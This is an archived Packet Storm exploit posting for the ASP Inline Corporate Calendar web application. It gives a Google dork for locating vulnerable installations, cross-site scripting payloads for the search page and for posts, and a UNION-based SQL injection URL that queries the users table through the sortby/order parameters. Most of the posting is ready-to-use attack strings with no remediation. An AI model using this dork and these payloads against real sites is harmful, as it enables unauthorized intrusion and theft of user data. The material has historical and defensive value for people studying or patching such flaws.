ASP Inline Corporate Calendar XSS / SQL Injection

2009-05-21T00:00:00
ID PACKETSTORM:77722
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2009-05-21T00:00:00

Description

                                        
                                            `000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000  
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0  
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0  
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0  
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0  
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0  
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0  
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0  
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000  
  
  
  
[+] Script : ASP Talk   
  
[+] Exploit Type : Multiple Exploits (SQL/CSS)  
  
[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=  
  
[+] Contact : blackbeard-sql A.T hotmail.fr   
  
--//--> Exploit :   
  
1)Cross site scripting :  
  
http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All  
  
post = <script>alert('Bl@clbe@rD Is Here');</script>  
  
2) Remote sql injection Exploit :  
  
http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users  
  
[peace xD]  
  
  
`